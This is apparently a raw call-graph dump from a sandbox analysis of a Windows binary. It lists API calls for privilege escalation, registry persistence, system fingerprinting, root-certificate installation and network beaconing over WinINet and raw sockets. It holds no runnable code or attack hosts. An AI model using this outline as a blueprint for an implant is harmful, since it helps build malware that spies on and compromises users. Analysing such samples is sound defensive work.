37518->37520 37521 2d2300 Sleep 37519->37521 37522 2d231d 37520->37522 37523 2d2316 CloseHandle 37520->37523 37521->37521 37524 2d230a 37521->37524 37522->37294 37523->37522 37524->37520 37525->37324 37526->37322 37530 2e057e 37527->37530 37529 3791ba 37529->37349 37531 2e0583 ___std_exception_copy 37530->37531 37532 2e05af 37531->37532 37536 383a6d 7 API calls 2 library calls 37531->37536 37537 2e0ce3 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 37531->37537 37538 2e0503 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 37531->37538 37532->37529 37536->37531 37540 2d3529 WSAStartup 37539->37540 37540->37353 37541->37362 37543 2d7177 LookupPrivilegeValueA 37542->37543 37544 2d71e6 37542->37544 37546 2d718c AdjustTokenPrivileges 37543->37546 37547 2d71d3 37543->37547 37545 2e056d CatchGuardHandler 5 API calls 37544->37545 37549 2d71f5 37545->37549 37546->37547 37548 2e056d CatchGuardHandler 5 API calls 37547->37548 37550 2d71e2 37548->37550 37549->37382 37550->37382 37552 38353b 37551->37552 37553 3836d6 37551->37553 37552->37553 37557 3835a6 37552->37557 37554 380e9e __dosmaperr 20 API calls 37553->37554 37555 3836e6 37554->37555 37578 37f971 26 API calls __wsopen_s 37555->37578 37558 3835c5 37557->37558 37565 3835ed 37557->37565 37573 38f351 26 API calls 2 library calls 37557->37573 37561 380e9e __dosmaperr 20 API calls 37558->37561 37560 3836a7 37560->37558 37562 3835d5 37560->37562 37566 3836b8 37560->37566 37561->37562 37562->37344 37563 383661 37563->37558 37564 383681 37563->37564 37575 38f351 26 API calls 2 library calls 37563->37575 37564->37558 37564->37562 37569 383695 37564->37569 37565->37558 37572 383645 37565->37572 37574 38f351 26 API calls 2 library calls 37565->37574 37577 38f351 26 API calls 2 library calls 37566->37577 37576 38f351 26 API calls 2 library calls 37569->37576 37572->37560 37572->37563 37573->37565 37574->37572 37575->37564 37576->37562 37577->37562 37578->37562 37582 381566 37579->37582 37581 2db693 SetCurrentDirectoryA 37581->37307 37581->37344 37583 381571 37582->37583 37584 381586 37582->37584 37585 380e9e __dosmaperr 20 API calls 37583->37585 37586 3815c8 37584->37586 37589 381594 37584->37589 37588 381576 37585->37588 37587 380e9e __dosmaperr 20 API calls 37586->37587 37590 3815c0 37587->37590 37598 37f971 26 API calls __wsopen_s 37588->37598 37599 38126e 50 API calls 5 library calls 37589->37599 37600 37f971 26 API calls __wsopen_s 37590->37600 37593 381581 37593->37581 37594 3815ac 37596 3815d8 37594->37596 37597 380e9e __dosmaperr 20 API calls 37594->37597 37596->37581 37597->37590 37598->37593 37599->37594 37600->37596 37616 2da510 37601->37616 37603 2dab3e 37604 2dab69 ___scrt_fastfail 37603->37604 37605 2dab42 37603->37605 37608 2d5bf0 50 API calls 37604->37608 37628 2da3b0 37605->37628 37607 2dab53 37609 2dab57 37607->37609 37612 2daba7 37607->37612 37611 2dab97 DeleteFileA 37608->37611 37610 2e056d CatchGuardHandler 5 API calls 37609->37610 37613 2dab65 37610->37613 37611->37612 37614 2e056d CatchGuardHandler 5 API calls 37612->37614 37613->37392 37615 2dabd7 37614->37615 37615->37392 37617 2da52a 37616->37617 37618 2da532 RegOpenKeyExA 37616->37618 37617->37603 37619 2da5fc GetLastError 37618->37619 37620 2da555 RegQueryValueExA 37618->37620 37619->37603 37621 2da5eb RegCloseKey 37620->37621 37622 2da57b ___std_exception_copy ___scrt_fastfail 37620->37622 37621->37603 37622->37621 37623 2da5ea 37622->37623 37624 2da59d RegQueryValueExA 37622->37624 37623->37621 37625 2da5bd RegCloseKey 37624->37625 37626 2da5db 37624->37626 37625->37603 37627 2da5e1 GetLastError 37626->37627 37627->37623 37629 2da3e9 ___scrt_fastfail 37628->37629 37630 2da3d8 37628->37630 37633 2d5bf0 50 API calls 37629->37633 37631 2e056d CatchGuardHandler 5 API calls 37630->37631 37632 2da3e5 37631->37632 37632->37607 37634 2da418 CreateFileA 37633->37634 37635 2da444 37634->37635 37636 2da4f0 37634->37636 37635->37636 37638 2da44d GetFileSize 37635->37638 37637 2e056d CatchGuardHandler 5 API calls 37636->37637 37639 2da4fe 37637->37639 37640 2da4e9 CloseHandle 37638->37640 37642 2da483 ___std_exception_copy ___scrt_fastfail 37638->37642 37639->37607 37640->37636 37641 2da4cb 37641->37640 37642->37641 37643 2da4a1 ReadFile 37642->37643 37643->37641 37644 2da4bf GetLastError 37643->37644 37644->37641 37646 3837bb 37645->37646 37648 3837cf 37645->37648 37647 380e9e __dosmaperr 20 API calls 37646->37647 37649 3837c0 37647->37649 37652 3837cb __alldvrm 37648->37652 37654 38dcd3 11 API calls 2 library calls 37648->37654 37653 37f971 26 API calls __wsopen_s 37649->37653 37652->37414 37653->37652 37654->37652 37656 38bd72 37655->37656 37657 38bd6c 37655->37657 37659 38b987 __dosmaperr 20 API calls 37656->37659 37661 38bdc1 SetLastError 37656->37661 37675 38dbc1 11 API calls 2 library calls 37657->37675 37660 38bd84 37659->37660 37667 38bd8c 37660->37667 37676 38dc17 11 API calls 2 library calls 37660->37676 37661->37417 37663 38b8ff _unexpected 20 API calls 37665 38bd92 37663->37665 37664 38bda1 37666 38bda8 37664->37666 37664->37667 37668 38bdcd SetLastError 37665->37668 37677 38bbc8 20 API calls __dosmaperr 37666->37677 37667->37663 37678 38b8bc 38 API calls _abort 37668->37678 37671 38bdb3 37672 38b8ff _unexpected 20 API calls 37671->37672 37674 38bdba 37672->37674 37674->37661 37674->37668 37675->37656 37676->37664 37677->37671 37679->37427 37682 2df684 37680->37682 37684 2df6b8 37680->37684 37683 2d0420 26 API calls 37682->37683 37682->37684 37806 2dbd90 26 API calls 37682->37806 37683->37682 37684->37436 37807 2d0860 37685->37807 37687 2de0dd 37688 2e057e new 8 API calls 37687->37688 37689 2de0ee ___scrt_fastfail 37688->37689 37690 2de11f GetAdaptersInfo 37689->37690 37691 2de2cc 37689->37691 37696 2de141 ___scrt_fastfail 37690->37696 37698 2de1ad ___scrt_fastfail 37690->37698 37692 2d0420 26 API calls 37691->37692 37693 2de2ee 37692->37693 37694 2e056d CatchGuardHandler 5 API calls 37693->37694 37695 2de308 37694->37695 37702 3795d0 37695->37702 37696->37691 37699 2de177 GetAdaptersInfo 37696->37699 37697 2de23f wsprintfA 37700 2de23d 37697->37700 37698->37691 37698->37697 37698->37700 37699->37696 37699->37698 37701 2d0860 27 API calls 37700->37701 37701->37691 37703 3795d8 37702->37703 37705 3795de ___std_exception_copy ___scrt_fastfail 37702->37705 37703->37440 37704 37ab76 37704->37440 37705->37704 37872 37a830 37705->37872 37707 37abd2 37707->37440 37709 2de621 ___scrt_fastfail 37708->37709 37710 2d0860 27 API calls 37709->37710 37711 2de651 ___scrt_fastfail 37710->37711 37712 2de66b GetVersionExW 37711->37712 37713 2de68d wsprintfA 37712->37713 37714 2de70e 37712->37714 37716 2de6e5 37713->37716 37717 2d0420 26 API calls 37714->37717 37718 2d0860 27 API calls 37716->37718 37719 2de727 37717->37719 37718->37714 37720 2e056d CatchGuardHandler 5 API calls 37719->37720 37721 2de73f 37720->37721 37722 2d0490 37721->37722 37724 2d04ba 37722->37724 37730 2d04f8 37722->37730 37723 2d04d6 37725 2d04e2 37723->37725 37896 37f981 26 API calls __wsopen_s 37723->37896 37724->37723 37724->37730 37895 37f981 26 API calls __wsopen_s 37724->37895 37728 2d04ee 37725->37728 37897 37f981 26 API calls __wsopen_s 37725->37897 37728->37730 37898 37f981 26 API calls __wsopen_s 37728->37898 37730->37444 37733 2d044d 37732->37733 37734 2d042b 37732->37734 37733->37446 37734->37733 37735 2d043a 37734->37735 37899 37f981 26 API calls __wsopen_s 37734->37899 37736 2d0441 37735->37736 37900 37f981 26 API calls __wsopen_s 37735->37900 37739 2d0448 37736->37739 37901 37f981 26 API calls __wsopen_s 37736->37901 37739->37733 37902 37f981 26 API calls __wsopen_s 37739->37902 37744 2de361 ___scrt_fastfail 37743->37744 37745 2d0860 27 API calls 37744->37745 37746 2de39b GetComputerNameA 37745->37746 37747 2de3ba 37746->37747 37748 2de3e3 37746->37748 37750 2d0420 26 API calls 37747->37750 37749 2d0860 27 API calls 37748->37749 37749->37747 37751 2de435 37750->37751 37752 2e056d CatchGuardHandler 5 API calls 37751->37752 37753 2de44d 37752->37753 37753->37451 37903 2ddc20 GetNativeSystemInfo 37754->37903 37757 2de5a1 37759 2d0860 27 API calls 37757->37759 37758 2de5b2 37760 2d0860 27 API calls 37758->37760 37761 2de5ab 37759->37761 37762 2de5bc 37760->37762 37761->37458 37762->37458 37765 2ddcd7 37763->37765 37764 2ddcf0 wsprintfA 37764->37765 37765->37764 37765->37765 37766 2ddce6 37765->37766 37767 2d0860 27 API calls 37766->37767 37768 2ddd9e GetNativeSystemInfo 37767->37768 37769 2dddf4 RegOpenKeyExA 37768->37769 37771 2dde49 37769->37771 37772 2dde53 RegOpenKeyExA 37769->37772 37771->37772 37773 2dde79 ___scrt_fastfail 37771->37773 37772->37773 37779 2ddfb8 ___BuildCatchObjectHelper 37772->37779 37774 2ddebd RegQueryValueExA 37773->37774 37773->37779 37775 2ddf6c RegCloseKey 37774->37775 37776 2ddefb 37774->37776 37775->37779 37905 383a09 43 API calls 37776->37905 37778 2e056d CatchGuardHandler 5 API calls 37780 2de06b 37778->37780 37779->37778 37780->37467 37781 2ddf30 37782 2d0860 27 API calls 37781->37782 37782->37775 37784 2de52b 37783->37784 37786 2de53f 37783->37786 37785 2d0860 27 API calls 37784->37785 37787 2de538 37785->37787 37786->37786 37788 2d0860 27 API calls 37786->37788 37787->37474 37789 2de55d 37788->37789 37789->37474 37791 2d0860 27 API calls 37790->37791 37792 2de4d0 37791->37792 37792->37483 37794 2d0860 27 API calls 37793->37794 37795 2de490 37794->37795 37795->37491 37797 2d894c ___scrt_fastfail 37796->37797 37798 3802fe ___std_exception_copy 26 API calls 37797->37798 37799 2d8962 _strrchr 37798->37799 37801 2d8999 _strstr 37799->37801 37906 380dfb 37799->37906 37802 2d89ee 37801->37802 37804 3802fe ___std_exception_copy 26 API calls 37801->37804 37803 2e056d CatchGuardHandler 5 API calls 37802->37803 37805 2d89fd 37803->37805 37804->37802 37805->37499 37805->37500 37806->37682 37808 2d08c5 37807->37808 37814 2d086e 37807->37814 37809 2d08ce 37808->37809 37810 2d094b 37808->37810 37815 2d08de __fread_nolock 37809->37815 37844 2d0d80 37809->37844 37861 2e0520 27 API calls 2 library calls 37810->37861 37814->37808 37816 2d0894 37814->37816 37815->37687 37817 2d08af 37816->37817 37818 2d0899 37816->37818 37820 2d0960 27 API calls 37817->37820 37823 2d0960 37818->37823 37822 2d08bf 37820->37822 37821 2d08a9 37821->37687 37822->37687 37824 2d0979 37823->37824 37825 2d0a62 37823->37825 37827 2d09ce 37824->37827 37828 2d0987 37824->37828 37864 2e0540 27 API calls 2 library calls 37825->37864 37829 2d09d7 37827->37829 37830 2d0a76 37827->37830 37831 2d0a6c 37828->37831 37832 2d0993 37828->37832 37839 2d0d80 27 API calls 37829->37839 37843 2d09e7 __fread_nolock 37829->37843 37866 2e0520 27 API calls 2 library calls 37830->37866 37865 2e0540 27 API calls 2 library calls 37831->37865 37834 2d099c 37832->37834 37835 2d09b5 37832->37835 37862 2d02c0 27 API calls ___BuildCatchObjectHelper 37834->37862 37863 2d02c0 27 API calls ___BuildCatchObjectHelper 37835->37863 37839->37843 37841 2d09ac 37841->37821 37842 2d09c5 37842->37821 37843->37821 37845 2d0dbd 37844->37845 37846 2d0e21 37845->37846 37847 2d0e01 37845->37847 37851 2d0df6 __fread_nolock 37845->37851 37849 2e057e new 8 API calls 37846->37849 37848 2d0e0d 37847->37848 37867 2e0503 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 37847->37867 37853 2e057e new 8 API calls 37848->37853 37849->37851 37852 2d0eb7 37851->37852 37854 2d0e95 37851->37854 37868 37f981 26 API calls __wsopen_s 37851->37868 37852->37815 37853->37851 37856 2d0ea1 37854->37856 37869 37f981 26 API calls __wsopen_s 37854->37869 37858 2d0ead 37856->37858 37870 37f981 26 API calls __wsopen_s 37856->37870 37858->37852 37871 37f981 26 API calls __wsopen_s 37858->37871 37862->37841 37863->37842 37864->37831 37865->37830 37873 37a840 37872->37873 37874 37a83b 37872->37874 37875 37a847 37873->37875 37879 37a85f ___scrt_fastfail 37873->37879 37874->37707 37876 380e9e __dosmaperr 20 API calls 37875->37876 37877 37a84c 37876->37877 37892 37f971 26 API calls __wsopen_s 37877->37892 37878 37a86f __fread_nolock 37878->37707 37879->37878 37881 37a891 37879->37881 37882 37a8ab 37879->37882 37884 380e9e __dosmaperr 20 API calls 37881->37884 37885 37a8a1 37882->37885 37887 380e9e __dosmaperr 20 API calls 37882->37887 37883 37a857 37883->37707 37886 37a896 37884->37886 37885->37707 37893 37f971 26 API calls __wsopen_s 37886->37893 37889 37a8b4 37887->37889 37894 37f971 26 API calls __wsopen_s 37889->37894 37891 37a8bf 37891->37707 37892->37883 37893->37885 37894->37891 37904 2ddc73 37903->37904 37904->37757 37904->37758 37905->37781 37907 380e14 __except_handler4 37906->37907 37910 380825 37907->37910 37928 382cfe 37910->37928 37912 380837 37913 380872 37912->37913 37915 38084c 37912->37915 37927 38085c 37912->37927 37936 380cf3 37913->37936 37916 380e9e __dosmaperr 20 API calls 37915->37916 37917 380851 37916->37917 37935 37f971 26 API calls __wsopen_s 37917->37935 37920 38087e 37921 3808ad 37920->37921 37944 380dc8 42 API calls __except_handler4 37920->37944 37924 380919 37921->37924 37945 380d76 26 API calls 2 library calls 37921->37945 37946 380d76 26 API calls 2 library calls 37924->37946 37925 3809e0 __except_handler4 37926 380e9e __dosmaperr 20 API calls 37925->37926 37925->37927 37926->37927 37927->37801 37929 382d03 37928->37929 37930 382d16 37928->37930 37931 380e9e __dosmaperr 20 API calls 37929->37931 37930->37912 37932 382d08 37931->37932 37947 37f971 26 API calls __wsopen_s 37932->37947 37934 382d13 37934->37912 37935->37927 37937 380d10 37936->37937 37938 380d06 37936->37938 37937->37938 37939 38bd56 _abort 38 API calls 37937->37939 37938->37920 37940 380d31 37939->37940 37948 38d8c8 38 API calls __cftof 37940->37948 37942 380d4a 37949 38d8f5 38 API calls __cftof 37942->37949 37944->37920 37945->37924 37946->37925 37947->37934 37948->37942 37949->37938 37951 38b987 __dosmaperr 20 API calls 37950->37951 37952 38111a 37951->37952 37953 38b8ff _unexpected 20 API calls 37952->37953 37954 381123 37953->37954 37955 38112a GetModuleHandleExW 37954->37955 37956 381142 37954->37956 37955->37956 37957 38107c 22 API calls 37956->37957 37958 38114c 37957->37958 37958->37510 37958->37511 37959->37512 37960->37510 37962 381089 37961->37962 37968 3810ad 37961->37968 37963 381098 37962->37963 37964 38108f CloseHandle 37962->37964 37965 38109e FreeLibrary 37963->37965 37966 3810a7 37963->37966 37964->37963 37965->37966 37967 38b8ff _unexpected 20 API calls 37966->37967 37967->37968 37968->37512 37970 381009 _abort 37969->37970 37971 38101d 37970->37971 37972 381010 GetLastError RtlExitUserThread 37970->37972 37973 38bd56 _abort 38 API calls 37971->37973 37972->37971 37974 381022 37973->37974 37985 38df30 37974->37985 37977 381038 37992 2dac90 37977->37992 37986 38df55 37985->37986 37987 38df4b 37985->37987 38030 38d93c 5 API calls 2 library calls 37986->38030 37989 2e056d CatchGuardHandler 5 API calls 37987->37989 37990 38102d 37989->37990 37990->37977 38028 38de6f 10 API calls 2 library calls 37990->38028 37991 38df6c 37991->37987 37993 2dacd5 ___scrt_fastfail 37992->37993 38031 2d8480 37993->38031 37995 2dad8f RegOpenKeyExA 38020 2dad3e __fread_nolock ___std_exception_copy ___scrt_fastfail 37995->38020 37997 2dadcd RegQueryValueExA 37998 2dae18 RegCloseKey 37997->37998 37997->38020 37998->38020 37999 2daf2e 38000 2d22f0 2 API calls 37999->38000 38001 2db2f3 38000->38001 38168 3811df 23 API calls 38001->38168 38005 2db2bf Sleep 38005->38020 38015 2d22f0 2 API calls 38015->38020 38019 2e057e new 8 API calls 38019->38020 38020->37995 38020->37997 38020->37998 38020->37999 38020->38005 38020->38015 38020->38019 38022 2db27f ResumeThread 38020->38022 38023 2db25a CreateThread 38020->38023 38026 2db208 ResumeThread 38020->38026 38027 2db1f1 CreateThread 38020->38027 38034 2da760 38020->38034 38050 379320 38020->38050 38063 2d9070 38020->38063 38074 2d9ce0 38020->38074 38093 2dd730 38020->38093 38096 2dd870 38020->38096 38144 2cf8b0 LoadLibraryA 38020->38144 38157 2da610 38020->38157 38022->37999 38022->38020 38023->38022 39604 2d2270 329 API calls 38023->39604 38026->38020 38027->38026 39597 2d2270 38027->39597 38028->37977 38030->37991 38032 2e057e new 8 API calls 38031->38032 38033 2d8487 38032->38033 38033->38020 38035 2da8cb 38034->38035 38036 2da783 38034->38036 38037 2e056d CatchGuardHandler 5 API calls 38035->38037 38036->38035 38038 2da510 7 API calls 38036->38038 38039 2da8d6 38037->38039 38040 2da7b5 38038->38040 38039->38020 38041 2da7b9 38040->38041 38042 2da7d4 ___scrt_fastfail 38040->38042 38043 2da3b0 55 API calls 38041->38043 38044 2d5bf0 50 API calls 38042->38044 38049 2da7ca 38043->38049 38045 2da802 DeleteFileA 38044->38045 38045->38049 38047 2da8c1 38047->38035 38048 2da8c5 GetLastError 38047->38048 38048->38035 38049->38035 38169 2da2f0 RegOpenKeyExA 38049->38169 38200 37a4c0 38050->38200 38052 379374 38061 37949b ___InternalCxxFrameHandler 38052->38061 38213 37abf0 38052->38213 38054 2e056d CatchGuardHandler 5 API calls 38055 3794c7 38054->38055 38055->38020 38058 3793cf 38062 379417 38058->38062 38239 37aa10 46 API calls 2 library calls 38058->38239 38061->38054 38240 37a720 10 API calls 38062->38240 38064 2d90b5 ___scrt_fastfail 38063->38064 38065 2d92f2 38064->38065 38398 2dbdd0 38064->38398 38067 2e056d CatchGuardHandler 5 API calls 38065->38067 38068 2d9310 38067->38068 38068->38020 38070 2dbdd0 26 API calls 38073 2d9129 38070->38073 38072 379680 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38072->38073 38073->38065 38073->38072 38403 2d8a10 38073->38403 38442 2dc950 38074->38442 38077 2da14d 38078 2e056d CatchGuardHandler 5 API calls 38077->38078 38079 2da173 38078->38079 38079->38020 38080 2d9db6 38445 2dbf00 38080->38445 38082 2d0960 27 API calls 38092 2d9d34 __fread_nolock ___std_exception_copy ___scrt_fastfail 38082->38092 38084 2d0490 26 API calls 38084->38092 38085 2da0f7 38456 37f981 26 API calls __wsopen_s 38085->38456 38087 2da0fc 38089 2d0420 26 API calls 38087->38089 38089->38080 38090 2d0420 26 API calls 38090->38092 38091 2d5bf0 50 API calls 38091->38092 38092->38080 38092->38082 38092->38084 38092->38085 38092->38087 38092->38090 38092->38091 38092->38092 38453 2dbd90 26 API calls 38092->38453 38454 2d96b0 52 API calls CatchGuardHandler 38092->38454 38455 2dca50 27 API calls 38092->38455 38459 2d2810 38093->38459 38097 2dd8e1 38096->38097 38098 2d0860 27 API calls 38097->38098 38099 2dd907 38098->38099 38462 3540b0 38099->38462 38145 2cf8ce 38144->38145 38146 2cf8d5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38144->38146 38145->38020 38147 2cf94e 38146->38147 38148 2cfa43 FreeLibrary 38146->38148 38147->38148 38149 2cf972 CertCreateCertificateContext 38147->38149 38148->38020 38150 2cf9ac GetLastError FreeLibrary 38149->38150 38151 2cf9c3 CertOpenStore 38149->38151 38150->38020 38152 2cf9dc GetLastError 38151->38152 38153 2cf9e4 CertAddCertificateContextToStore 38151->38153 38154 2cfa0e 38152->38154 38153->38154 38155 2cf9fb GetLastError 38153->38155 38154->38148 38155->38154 38156 2cfa0a GetLastError 38155->38156 38156->38154 38158 2da62a 38157->38158 38159 2da757 38157->38159 38158->38159 38160 38382b 27 API calls 38158->38160 38159->38020 38161 2da63a 38160->38161 38162 38379a 38 API calls 38161->38162 38163 2da640 38162->38163 38164 383779 38 API calls 38163->38164 38166 2da66f __fread_nolock ___std_exception_copy 38164->38166 38165 2da6a5 38165->38020 38166->38165 38167 2da2f0 63 API calls 38166->38167 38167->38165 38170 2da335 GetLastError RegCreateKeyA 38169->38170 38171 2da364 RegSetValueExA 38169->38171 38170->38171 38174 2da351 GetLastError 38170->38174 38172 2da37e GetLastError 38171->38172 38173 2da382 RegCloseKey 38171->38173 38172->38173 38176 2da38f 38173->38176 38177 2da3a0 38173->38177 38175 2da1b0 56 API calls 38174->38175 38178 2da35d 38175->38178 38181 2da1b0 38176->38181 38177->38047 38178->38047 38180 2da399 38180->38047 38182 2da2cf 38181->38182 38183 2da1d7 38181->38183 38184 2e056d CatchGuardHandler 5 API calls 38182->38184 38183->38182 38186 2da1e0 ___scrt_fastfail 38183->38186 38185 2da2dd 38184->38185 38185->38180 38187 2d5bf0 50 API calls 38186->38187 38188 2da20f CreateFileA 38187->38188 38189 2da237 38188->38189 38190 2da2b6 GetLastError 38188->38190 38189->38190 38191 2da23c WriteFile 38189->38191 38192 2e056d CatchGuardHandler 5 API calls 38190->38192 38193 2da29a CloseHandle 38191->38193 38194 2da27a GetLastError CloseHandle 38191->38194 38195 2da2cb 38192->38195 38197 2e056d CatchGuardHandler 5 API calls 38193->38197 38196 2e056d CatchGuardHandler 5 API calls 38194->38196 38195->38180 38198 2da296 38196->38198 38199 2da2b2 38197->38199 38198->38180 38199->38180 38201 37a4cc 38200->38201 38202 37a4c9 38200->38202 38241 37a1a0 26 API calls 38201->38241 38202->38052 38204 37a4d2 LoadLibraryW 38205 37a4f6 LoadLibraryW 38204->38205 38212 37a701 38204->38212 38206 37a50a LoadLibraryW 38205->38206 38205->38212 38207 37a51e 10 API calls 38206->38207 38206->38212 38208 37a5ef 38207->38208 38207->38212 38209 37a65f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38208->38209 38208->38212 38210 37a6cc 38209->38210 38209->38212 38211 37a6eb GetProcAddress 38210->38211 38210->38212 38211->38212 38212->38052 38214 37e1a0 ___scrt_fastfail 38213->38214 38215 37ac19 WSAStartup 38214->38215 38216 2e056d CatchGuardHandler 5 API calls 38215->38216 38217 37938e 38216->38217 38218 37b210 38217->38218 38242 37b080 InternetOpenA 38218->38242 38221 37b25d 38222 37b268 38221->38222 38234 37b581 38221->38234 38226 2e056d CatchGuardHandler 5 API calls 38222->38226 38223 2e056d CatchGuardHandler 5 API calls 38225 37b5b3 38223->38225 38224 37b282 ___std_exception_copy ___scrt_fastfail 38260 37c0e0 38224->38260 38225->38058 38227 37b27c 38226->38227 38227->38058 38229 37b2b7 38266 37c460 38229->38266 38231 37b2e3 38231->38234 38280 379680 38231->38280 38233 37a830 26 API calls 38237 37b308 ___std_exception_copy ___scrt_fastfail 38233->38237 38234->38223 38235 37afb0 82 API calls 38235->38237 38237->38233 38237->38234 38237->38235 38288 37b5c0 38237->38288 38292 37ac40 38237->38292 38239->38062 38240->38061 38241->38204 38243 37b0d0 InternetOpenUrlA 38242->38243 38258 37b115 38242->38258 38244 37b10e InternetCloseHandle 38243->38244 38245 37b0e9 HttpQueryInfoA 38243->38245 38244->38258 38246 37b107 InternetCloseHandle 38245->38246 38247 37b11c 38245->38247 38246->38244 38249 380dfb 42 API calls 38247->38249 38248 2e056d CatchGuardHandler 5 API calls 38250 37b20a 38248->38250 38251 37b12f 38249->38251 38250->38221 38250->38224 38252 37b151 38251->38252 38316 2d1a80 27 API calls ___scrt_fastfail 38251->38316 38253 37b165 InternetReadFile InternetCloseHandle InternetCloseHandle 38252->38253 38255 37b191 38253->38255 38257 37b195 ___std_exception_copy ___scrt_fastfail 38253->38257 38256 2d0420 26 API calls 38255->38256 38256->38258 38259 37a830 26 API calls 38257->38259 38258->38248 38259->38255 38261 37c11f 38260->38261 38262 37c166 38261->38262 38265 37c142 wsprintfA 38261->38265 38263 2e056d CatchGuardHandler 5 API calls 38262->38263 38264 37c172 38263->38264 38264->38229 38265->38262 38268 37c4ab 38266->38268 38267 2d0860 27 API calls 38269 37c4c7 38267->38269 38268->38267 38317 37c280 38269->38317 38271 37c51f 38273 37c55c 38271->38273 38335 2d0d30 26 API calls 38271->38335 38272 37c4db ___std_exception_copy ___scrt_fastfail 38272->38271 38276 37a830 26 API calls 38272->38276 38275 37c583 38273->38275 38336 2d0d30 26 API calls 38273->38336 38278 2e056d CatchGuardHandler 5 API calls 38275->38278 38276->38271 38279 37c59b 38278->38279 38279->38231 38281 3796b4 38280->38281 38342 379be0 38281->38342 38283 3796eb 38284 37971a 38283->38284 38346 379730 5 API calls CatchGuardHandler 38283->38346 38285 2e056d CatchGuardHandler 5 API calls 38284->38285 38287 379727 38285->38287 38287->38237 38290 37b5e0 ___std_exception_copy ___scrt_fastfail 38288->38290 38291 37b75f 38288->38291 38289 37a830 26 API calls 38289->38290 38290->38289 38290->38291 38291->38237 38296 37ac4d __except_handler4 ___std_exception_copy ___scrt_fastfail 38292->38296 38293 37af8c 38294 2e056d CatchGuardHandler 5 API calls 38293->38294 38295 37afa4 38294->38295 38295->38237 38296->38293 38297 37ace8 InternetCrackUrlA 38296->38297 38298 37ad3e ___scrt_fastfail 38297->38298 38309 37ae32 ___scrt_fastfail 38297->38309 38300 2d5bf0 50 API calls 38298->38300 38299 37ae55 InternetOpenA 38299->38293 38301 37ae76 InternetOpenUrlA 38299->38301 38305 37adf6 38300->38305 38302 37aea5 38301->38302 38303 37ae94 InternetCloseHandle 38301->38303 38304 37aeb0 InternetReadFile 38302->38304 38303->38293 38304->38304 38306 37aee6 InternetCloseHandle InternetCloseHandle 38304->38306 38305->38305 38347 37b7e0 gethostbyname 38305->38347 38306->38293 38307 37af06 38306->38307 38307->38293 38310 37af18 38307->38310 38309->38299 38309->38310 38375 37c5a0 38310->38375 38312 37af25 ___std_exception_copy 38312->38293 38313 37af53 __fread_nolock ___scrt_fastfail 38312->38313 38314 2e056d CatchGuardHandler 5 API calls 38313->38314 38315 37af86 38314->38315 38315->38237 38316->38253 38318 37c2e7 38317->38318 38319 37c2c3 38317->38319 38325 37c304 38318->38325 38337 2d1a80 27 API calls ___scrt_fastfail 38318->38337 38320 2d0860 27 API calls 38319->38320 38324 37c2e2 ___BuildCatchObjectHelper 38320->38324 38322 2e056d CatchGuardHandler 5 API calls 38323 37c45c 38322->38323 38323->38272 38324->38322 38325->38324 38326 2d0860 27 API calls 38325->38326 38328 37c3e8 38326->38328 38327 37c405 38330 37c411 38327->38330 38339 37f981 26 API calls __wsopen_s 38327->38339 38328->38324 38328->38327 38338 37f981 26 API calls __wsopen_s 38328->38338 38332 37c41d 38330->38332 38340 37f981 26 API calls __wsopen_s 38330->38340 38332->38324 38341 37f981 26 API calls __wsopen_s 38332->38341 38335->38273 38336->38275 38337->38325 38343 379c05 __fread_nolock 38342->38343 38344 2e056d CatchGuardHandler 5 API calls 38343->38344 38345 379cbb 38344->38345 38345->38283 38346->38283 38348 37b814 38347->38348 38349 37b828 socket 38347->38349 38350 2e056d CatchGuardHandler 5 API calls 38348->38350 38351 37b9ad 38349->38351 38352 37b840 setsockopt 38349->38352 38353 37b822 38350->38353 38354 2e056d CatchGuardHandler 5 API calls 38351->38354 38355 37b867 setsockopt 38352->38355 38356 37b8fc closesocket 38352->38356 38353->38309 38359 37b9c5 38354->38359 38355->38356 38357 37b883 htons inet_addr connect 38355->38357 38358 2e056d CatchGuardHandler 5 API calls 38356->38358 38360 37b8b5 connect 38357->38360 38361 37b8d1 send 38357->38361 38362 37b912 38358->38362 38359->38309 38360->38356 38360->38361 38361->38356 38363 37b8e4 ___std_exception_copy 38361->38363 38362->38309 38363->38356 38364 37b918 ___scrt_fastfail 38363->38364 38365 37b925 recv 38364->38365 38366 37b965 closesocket 38365->38366 38367 37b93b 38365->38367 38366->38351 38368 37b974 38366->38368 38367->38366 38371 37b9a6 closesocket 38367->38371 38372 37b94f recv 38367->38372 38384 37c690 38368->38384 38370 37b981 38373 2e056d CatchGuardHandler 5 API calls 38370->38373 38371->38351 38372->38366 38372->38367 38374 37b9a0 38373->38374 38374->38309 38397 37bd80 35 API calls 2 library calls 38375->38397 38377 37c5d3 38378 37c672 38377->38378 38379 37c65c 38377->38379 38380 2e056d CatchGuardHandler 5 API calls 38378->38380 38381 2e056d CatchGuardHandler 5 API calls 38379->38381 38382 37c687 38380->38382 38383 37c66e 38381->38383 38382->38312 38383->38312 38395 37bee0 48 API calls 4 library calls 38384->38395 38386 37c6c5 38387 37c6ce 38386->38387 38388 37c6da 38386->38388 38389 37c6f9 38386->38389 38387->38370 38396 37bc70 26 API calls CatchGuardHandler 38388->38396 38391 37c720 38389->38391 38393 37a830 26 API calls 38389->38393 38391->38370 38392 37c6ee 38392->38370 38394 37c715 38393->38394 38394->38370 38395->38386 38396->38392 38397->38377 38399 2d90ef 38398->38399 38402 2dbde6 38398->38402 38399->38070 38400 2dbdd0 26 API calls 38400->38402 38401 2d0420 26 API calls 38401->38402 38402->38399 38402->38400 38402->38401 38404 2d8b3a 38403->38404 38405 2d8a2d 38403->38405 38404->38073 38406 2d8b12 38405->38406 38408 2d8ec0 38405->38408 38406->38073 38409 2d902d 38408->38409 38416 2d8f34 __fread_nolock ___std_exception_copy ___scrt_fastfail 38408->38416 38410 2d0420 26 API calls 38409->38410 38411 2d903b 38410->38411 38412 2d0420 26 API calls 38411->38412 38413 2d9043 38412->38413 38414 2e056d CatchGuardHandler 5 API calls 38413->38414 38415 2d905d 38414->38415 38415->38405 38416->38409 38419 2d8fab __fread_nolock ___std_exception_copy ___scrt_fastfail 38416->38419 38431 2d03e0 27 API calls 38416->38431 38423 2d8fe5 38419->38423 38432 2d03e0 27 API calls 38419->38432 38420 2d9016 38420->38409 38422 2d0960 27 API calls 